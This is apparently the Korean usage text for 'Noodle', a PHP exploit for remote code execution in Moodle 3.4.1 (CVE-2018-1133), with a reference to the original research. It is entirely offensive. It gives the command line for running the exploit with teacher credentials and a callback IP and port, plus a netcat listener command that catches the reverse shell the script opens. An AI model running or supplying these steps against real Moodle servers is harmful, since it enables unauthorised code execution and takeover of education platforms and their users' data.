
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
교사 역할을 가진 사용자가 임의 코드를 실행할 수 있습니다.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user 계정 사용자 이름
pass 계정 비밀번호
ip 콜백 IP
port 콜백 포트
course 교사 소유의 유효한 강좌 ID
지정된 포트에서 netcat 리스너를 실행 중인지 확인하세요. 이 스크립트를 실행하기 전에.
nc -lnvp 1010
이것은 리스닝 IP와 포트로 리버스 셸을 열려고 시도합니다.
이 익스플로잇은 Robin Peraglie가 제공한 정보를 기반으로 합니다.
추가 자료: https://blog.ripstech.com/2018/moodle-remote-code-execution